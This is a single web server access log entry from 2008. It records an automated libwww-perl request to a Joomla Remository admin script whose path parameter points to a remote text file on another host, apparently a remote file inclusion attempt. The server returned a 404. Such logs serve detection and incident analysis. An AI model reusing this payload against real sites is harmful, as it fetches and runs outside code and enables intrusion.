87.106.129.86 - - [17/Apr/2008:12:39:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.systel.ru/phpbb2//language/lang_german/mail.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
